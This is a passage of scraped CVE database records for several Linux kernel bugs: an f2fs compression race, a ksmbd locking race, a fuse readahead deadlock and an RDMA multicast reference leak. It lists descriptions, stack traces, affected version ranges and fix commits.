"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ad26bfbc085c939b5dca77ff8c14798c06d151c4",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "0bf1a02494c7eb5bd43445de4c83c8592e02c4bf",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "0df713a9c082a474c8b0bcf670edc8e98461d5a0",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/data.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/file.c",
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid updating compression context during writeback\n\nBai, Shuangpeng \u003csjb7183@psu.edu\u003e reported a bug as below:\n\nOops: divide error: 0000 [#1] SMP KASAN PTI\nCPU: 0 UID: 0 PID: 11441 Comm: syz.0.46 Not tainted 6.17.0 #1 PREEMPT(full)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nRIP: 0010:f2fs_all_cluster_page_ready+0x106/0x550 fs/f2fs/compress.c:857\nCall Trace:\n \u003cTASK\u003e\n f2fs_write_cache_pages fs/f2fs/data.c:3078 [inline]\n __f2fs_write_data_pages fs/f2fs/data.c:3290 [inline]\n f2fs_write_data_pages+0x1c19/0x3600 fs/f2fs/data.c:3317\n do_writepages+0x38e/0x640 mm/page-writeback.c:2634\n filemap_fdatawrite_wbc mm/filemap.c:386 [inline]\n __filemap_fdatawrite_range mm/filemap.c:419 [inline]\n file_write_and_wait_range+0x2ba/0x3e0 mm/filemap.c:794\n f2fs_do_sync_file+0x6e6/0x1b00 fs/f2fs/file.c:294\n generic_write_sync include/linux/fs.h:3043 [inline]\n f2fs_file_write_iter+0x76e/0x2700 fs/f2fs/file.c:5259\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x7e9/0xe00 fs/read_write.c:686\n ksys_write+0x19d/0x2d0 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xf7/0x470 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe bug was triggered w/ below race condition:\n\nfsync\t\t\t\tsetattr\t\t\tioctl\n- f2fs_do_sync_file\n - file_write_and_wait_range\n - f2fs_write_cache_pages\n : inode is non-compressed\n : cc.cluster_size =\n F2FS_I(inode)-\u003ei_cluster_size = 0\n - tag_pages_for_writeback\n\t\t\t\t- f2fs_setattr\n\t\t\t\t - truncate_setsize\n\t\t\t\t - f2fs_truncate\n\t\t\t\t\t\t\t- f2fs_fileattr_set\n\t\t\t\t\t\t\t - f2fs_setflags_common\n\t\t\t\t\t\t\t - set_compress_context\n\t\t\t\t\t\t\t : F2FS_I(inode)-\u003ei_cluster_size = 4\n\t\t\t\t\t\t\t : set_inode_flag(inode, FI_COMPRESSED_FILE)\n - f2fs_compressed_file\n : return true\n - f2fs_all_cluster_page_ready\n : \"pgidx % cc-\u003ecluster_size\" trigger dividing 0 issue\n\nLet\u0027s change as below to fix this issue:\n- introduce a new atomic type variable .writeback in structure f2fs_inode_info\nto track the number of threads which calling f2fs_write_cache_pages().\n- use .i_sem lock to protect .writeback update.\n- check .writeback before update compression context in f2fs_setflags_common()\nto avoid race w/ -\u003ewritepages."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:49.924Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ad26bfbc085c939b5dca77ff8c14798c06d151c4"
},
{
"url": "https://git.kernel.org/stable/c/bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0"
},
{
"url": "https://git.kernel.org/stable/c/0bf1a02494c7eb5bd43445de4c83c8592e02c4bf"
},
{
"url": "https://git.kernel.org/stable/c/0df713a9c082a474c8b0bcf670edc8e98461d5a0"
},
{
"url": "https://git.kernel.org/stable/c/10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76"
}
],
"title": "f2fs: fix to avoid updating compression context during writeback",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68772",
"datePublished": "2026-01-13T15:28:49.924Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-13T15:28:49.924Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68809 (GCVE-0-2025-68809)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
VLAI?
EPSS
Title
ksmbd: vfs: fix race on m_flags in vfs_cache
Summary
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: vfs: fix race on m_flags in vfs_cache
ksmbd maintains delete-on-close and pending-delete state in
ksmbd_inode->m_flags. In vfs_cache.c this field is accessed under
inconsistent locking: some paths read and modify m_flags under
ci->m_lock while others do so without taking the lock at all.
Examples:
- ksmbd_query_inode_status() and __ksmbd_inode_close() use
ci->m_lock when checking or updating m_flags.
- ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),
ksmbd_clear_inode_pending_delete() and ksmbd_fd_set_delete_on_close()
used to read and modify m_flags without ci->m_lock.
This creates a potential data race on m_flags when multiple threads
open, close and delete the same file concurrently. In the worst case
delete-on-close and pending-delete bits can be lost or observed in an
inconsistent state, leading to confusing delete semantics (files that
stay on disk after delete-on-close, or files that disappear while still
in use).
Fix it by:
- Making ksmbd_query_inode_status() look at m_flags under ci->m_lock
after dropping inode_hash_lock.
- Adding ci->m_lock protection to all helpers that read or modify
m_flags (ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),
ksmbd_clear_inode_pending_delete(), ksmbd_fd_set_delete_on_close()).
- Keeping the existing ci->m_lock protection in __ksmbd_inode_close(),
and moving the actual unlink/xattr removal outside the lock.
This unifies the locking around m_flags and removes the data race while
preserving the existing delete-on-close behaviour.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Affected:
f44158485826c076335d6860d35872271a83791d , < 5adad9727a815c26013b0d41cfee92ffa7d4037c
(git)
Affected: f44158485826c076335d6860d35872271a83791d , < ccc78781041589ea383e61d5d7a1e9a31b210b93 (git) Affected: f44158485826c076335d6860d35872271a83791d , < ee63729760f5b61a66f345c54dc4c7514e62383d (git) Affected: f44158485826c076335d6860d35872271a83791d , < 991f8a79db99b14c48d20d2052c82d65b9186cad (git) |
||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs_cache.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5adad9727a815c26013b0d41cfee92ffa7d4037c",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "ccc78781041589ea383e61d5d7a1e9a31b210b93",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "ee63729760f5b61a66f345c54dc4c7514e62383d",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
},
{
"lessThan": "991f8a79db99b14c48d20d2052c82d65b9186cad",
"status": "affected",
"version": "f44158485826c076335d6860d35872271a83791d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/smb/server/vfs_cache.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: vfs: fix race on m_flags in vfs_cache\n\nksmbd maintains delete-on-close and pending-delete state in\nksmbd_inode-\u003em_flags. In vfs_cache.c this field is accessed under\ninconsistent locking: some paths read and modify m_flags under\nci-\u003em_lock while others do so without taking the lock at all.\n\nExamples:\n\n - ksmbd_query_inode_status() and __ksmbd_inode_close() use\n ci-\u003em_lock when checking or updating m_flags.\n - ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),\n ksmbd_clear_inode_pending_delete() and ksmbd_fd_set_delete_on_close()\n used to read and modify m_flags without ci-\u003em_lock.\n\nThis creates a potential data race on m_flags when multiple threads\nopen, close and delete the same file concurrently. In the worst case\ndelete-on-close and pending-delete bits can be lost or observed in an\ninconsistent state, leading to confusing delete semantics (files that\nstay on disk after delete-on-close, or files that disappear while still\nin use).\n\nFix it by:\n\n - Making ksmbd_query_inode_status() look at m_flags under ci-\u003em_lock\n after dropping inode_hash_lock.\n - Adding ci-\u003em_lock protection to all helpers that read or modify\n m_flags (ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(),\n ksmbd_clear_inode_pending_delete(), ksmbd_fd_set_delete_on_close()).\n - Keeping the existing ci-\u003em_lock protection in __ksmbd_inode_close(),\n and moving the actual unlink/xattr removal outside the lock.\n\nThis unifies the locking around m_flags and removes the data race while\npreserving the existing delete-on-close behaviour."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-14T08:51:39.332Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5adad9727a815c26013b0d41cfee92ffa7d4037c"
},
{
"url": "https://git.kernel.org/stable/c/ccc78781041589ea383e61d5d7a1e9a31b210b93"
},
{
"url": "https://git.kernel.org/stable/c/ee63729760f5b61a66f345c54dc4c7514e62383d"
},
{
"url": "https://git.kernel.org/stable/c/991f8a79db99b14c48d20d2052c82d65b9186cad"
}
],
"title": "ksmbd: vfs: fix race on m_flags in vfs_cache",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68809",
"datePublished": "2026-01-13T15:29:15.817Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-14T08:51:39.332Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68821 (GCVE-0-2025-68821)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
fuse: fix readahead reclaim deadlock
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: fix readahead reclaim deadlock
Commit e26ee4efbc79 ("fuse: allocate ff->release_args only if release is
needed") skips allocating ff->release_args if the server does not
implement open. However in doing so, fuse_prepare_release() now skips
grabbing the reference on the inode, which makes it possible for an
inode to be evicted from the dcache while there are inflight readahead
requests. This causes a deadlock if the server triggers reclaim while
servicing the readahead request and reclaim attempts to evict the inode
of the file being read ahead. Since the folio is locked during
readahead, when reclaim evicts the fuse inode and fuse_evict_inode()
attempts to remove all folios associated with the inode from the page
cache (truncate_inode_pages_range()), reclaim will block forever waiting
for the lock since readahead cannot relinquish the lock because it is
itself blocked in reclaim:
>>> stack_trace(1504735)
folio_wait_bit_common (mm/filemap.c:1308:4)
folio_lock (./include/linux/pagemap.h:1052:3)
truncate_inode_pages_range (mm/truncate.c:336:10)
fuse_evict_inode (fs/fuse/inode.c:161:2)
evict (fs/inode.c:704:3)
dentry_unlink_inode (fs/dcache.c:412:3)
__dentry_kill (fs/dcache.c:615:3)
shrink_kill (fs/dcache.c:1060:12)
shrink_dentry_list (fs/dcache.c:1087:3)
prune_dcache_sb (fs/dcache.c:1168:2)
super_cache_scan (fs/super.c:221:10)
do_shrink_slab (mm/shrinker.c:435:9)
shrink_slab (mm/shrinker.c:626:10)
shrink_node (mm/vmscan.c:5951:2)
shrink_zones (mm/vmscan.c:6195:3)
do_try_to_free_pages (mm/vmscan.c:6257:3)
do_swap_page (mm/memory.c:4136:11)
handle_pte_fault (mm/memory.c:5562:10)
handle_mm_fault (mm/memory.c:5870:9)
do_user_addr_fault (arch/x86/mm/fault.c:1338:10)
handle_page_fault (arch/x86/mm/fault.c:1481:3)
exc_page_fault (arch/x86/mm/fault.c:1539:2)
asm_exc_page_fault+0x22/0x27
Fix this deadlock by allocating ff->release_args and grabbing the
reference on the inode when preparing the file for release even if the
server does not implement open. The inode reference will be dropped when
the last reference on the fuse file is dropped (see fuse_file_put() ->
fuse_release_end()).
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
a39f70d63f4373a598820d9491719e44cd60afe9 , < cbbf3f1bb9f834bb2acbb61ddca74363456e19cd
(git)
Affected: 7d38aa079ed859b73f4460aab89c7619b04963b8 , < 4703bc0e8cd3409acb1476a70cb5b7ff943cf39a (git) Affected: c7ec75f3cbf73bd46f479f7d6942585f765715da , < cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f (git) Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6 (git) Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < e0d6de83a4cc22bbac72713f3a58121af36cc411 (git) Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/fuse/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cbbf3f1bb9f834bb2acbb61ddca74363456e19cd",
"status": "affected",
"version": "a39f70d63f4373a598820d9491719e44cd60afe9",
"versionType": "git"
},
{
"lessThan": "4703bc0e8cd3409acb1476a70cb5b7ff943cf39a",
"status": "affected",
"version": "7d38aa079ed859b73f4460aab89c7619b04963b8",
"versionType": "git"
},
{
"lessThan": "cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f",
"status": "affected",
"version": "c7ec75f3cbf73bd46f479f7d6942585f765715da",
"versionType": "git"
},
{
"lessThan": "fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6",
"status": "affected",
"version": "e26ee4efbc79610b20e7abe9d96c87f33dacc1ff",
"versionType": "git"
},
{
"lessThan": "e0d6de83a4cc22bbac72713f3a58121af36cc411",
"status": "affected",
"version": "e26ee4efbc79610b20e7abe9d96c87f33dacc1ff",
"versionType": "git"
},
{
"lessThan": "bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50",
"status": "affected",
"version": "e26ee4efbc79610b20e7abe9d96c87f33dacc1ff",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/fuse/file.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.196",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.158",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6.115",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix readahead reclaim deadlock\n\nCommit e26ee4efbc79 (\"fuse: allocate ff-\u003erelease_args only if release is\nneeded\") skips allocating ff-\u003erelease_args if the server does not\nimplement open. However in doing so, fuse_prepare_release() now skips\ngrabbing the reference on the inode, which makes it possible for an\ninode to be evicted from the dcache while there are inflight readahead\nrequests. This causes a deadlock if the server triggers reclaim while\nservicing the readahead request and reclaim attempts to evict the inode\nof the file being read ahead. Since the folio is locked during\nreadahead, when reclaim evicts the fuse inode and fuse_evict_inode()\nattempts to remove all folios associated with the inode from the page\ncache (truncate_inode_pages_range()), reclaim will block forever waiting\nfor the lock since readahead cannot relinquish the lock because it is\nitself blocked in reclaim:\n\n\u003e\u003e\u003e stack_trace(1504735)\n folio_wait_bit_common (mm/filemap.c:1308:4)\n folio_lock (./include/linux/pagemap.h:1052:3)\n truncate_inode_pages_range (mm/truncate.c:336:10)\n fuse_evict_inode (fs/fuse/inode.c:161:2)\n evict (fs/inode.c:704:3)\n dentry_unlink_inode (fs/dcache.c:412:3)\n __dentry_kill (fs/dcache.c:615:3)\n shrink_kill (fs/dcache.c:1060:12)\n shrink_dentry_list (fs/dcache.c:1087:3)\n prune_dcache_sb (fs/dcache.c:1168:2)\n super_cache_scan (fs/super.c:221:10)\n do_shrink_slab (mm/shrinker.c:435:9)\n shrink_slab (mm/shrinker.c:626:10)\n shrink_node (mm/vmscan.c:5951:2)\n shrink_zones (mm/vmscan.c:6195:3)\n do_try_to_free_pages (mm/vmscan.c:6257:3)\n do_swap_page (mm/memory.c:4136:11)\n handle_pte_fault (mm/memory.c:5562:10)\n handle_mm_fault (mm/memory.c:5870:9)\n do_user_addr_fault (arch/x86/mm/fault.c:1338:10)\n handle_page_fault (arch/x86/mm/fault.c:1481:3)\n exc_page_fault (arch/x86/mm/fault.c:1539:2)\n asm_exc_page_fault+0x22/0x27\n\nFix this deadlock by allocating ff-\u003erelease_args and grabbing the\nreference on the inode when preparing the file for release even if the\nserver does not implement open. The inode reference will be dropped when\nthe last reference on the fuse file is dropped (see fuse_file_put() -\u003e\nfuse_release_end())."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:26.320Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cbbf3f1bb9f834bb2acbb61ddca74363456e19cd"
},
{
"url": "https://git.kernel.org/stable/c/4703bc0e8cd3409acb1476a70cb5b7ff943cf39a"
},
{
"url": "https://git.kernel.org/stable/c/cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f"
},
{
"url": "https://git.kernel.org/stable/c/fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6"
},
{
"url": "https://git.kernel.org/stable/c/e0d6de83a4cc22bbac72713f3a58121af36cc411"
},
{
"url": "https://git.kernel.org/stable/c/bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50"
}
],
"title": "fuse: fix readahead reclaim deadlock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68821",
"datePublished": "2026-01-13T15:29:24.014Z",
"dateReserved": "2025-12-24T10:30:51.048Z",
"dateUpdated": "2026-01-19T12:19:26.320Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71084 (GCVE-0-2025-71084)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
RDMA/cm: Fix leaking the multicast GID table reference
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/cm: Fix leaking the multicast GID table reference
If the CM ID is destroyed while the CM event for multicast creating is
still queued the cancel_work_sync() will prevent the work from running
which also prevents destroying the ah_attr. This leaks a refcount and
triggers a WARN:
GID entry ref leak for dev syz1 index 2 ref=573
WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]
WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886
Destroy the ah_attr after canceling the work, it is safe to call this
twice.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
60d613b39e8d0c9f3b526e9c96445422b4562d76 , < d5ce588a9552878859a4d44b70b724216c188a5f
(git)
Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < abf38398724ecc888f62c678d288da40d11878af (git) Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < ab668a58c4a2ccb6d54add7a76f2f955d15d0196 (git) Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < c0acdee513239e1d6e1b490f56be0e6837dfd162 (git) Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < 5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3 (git) Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < 3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5 (git) Affected: fe454dc31e84f8c14cb8942fcb61666c9f40745b , < 57f3cb6c84159d12ba343574df2115fb18dd83ca (git) Affected: a3262b3884dd67b4c5632ce7cdf9cff9d1a575d4 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/cma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d5ce588a9552878859a4d44b70b724216c188a5f",
"status": "affected",
"version": "60d613b39e8d0c9f3b526e9c96445422b4562d76",
"versionType": "git"
},
{
"lessThan": "abf38398724ecc888f62c678d288da40d11878af",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "ab668a58c4a2ccb6d54add7a76f2f955d15d0196",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "c0acdee513239e1d6e1b490f56be0e6837dfd162",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"lessThan": "57f3cb6c84159d12ba343574df2115fb18dd83ca",
"status": "affected",
"version": "fe454dc31e84f8c14cb8942fcb61666c9f40745b",
"versionType": "git"
},
{
"status": "affected",
"version": "a3262b3884dd67b4c5632ce7cdf9cff9d1a575d4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/cma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
